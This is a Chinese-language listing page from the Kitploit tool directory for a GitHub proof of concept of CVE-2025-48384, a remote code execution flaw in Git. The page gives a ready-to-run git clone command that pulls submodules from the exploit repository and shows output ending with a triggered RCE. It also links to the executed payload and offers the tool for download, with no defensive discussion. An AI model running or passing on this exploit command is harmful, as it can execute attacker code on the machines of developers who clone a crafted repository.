Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-48384 — CVE-2025-48384 的 PoC | Kitploit
工具/GitHubGitHub/liamg/cve-2025-48384
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试Payload 开发
GitHubliamg/cve-2025-48384

CVE-2025-48384

CVE-2025-48384 的 PoC

查看仓库
20201年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-48384 的 PoC

参见 CVE-2025-48384

运行方式:

root@kitploit:~
git -c protocol.file.allow=always clone --recurse-submodules [email protected]:liamg/CVE-2025-48384.git

示例输出:

root@kitploit:~
git -c protocol.file.allow=always clone --recurse-submodules CVE-2025-48384 test
Cloning into 'test'...
done.
'ubmodule 'sub' ([email protected]:liamg/CVE-2025-48384-submodule.git) registered for path 'sub
'...ing into '/Users/liamg/test/sub
remote: Enumerating objects: 5, done.
remote: Counting objects: 100% (5/5), done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 5 (delta 0), reused 5 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (5/5), done.
Uh-oh, this is an RCE!

执行的 payload 在此处。

下载工具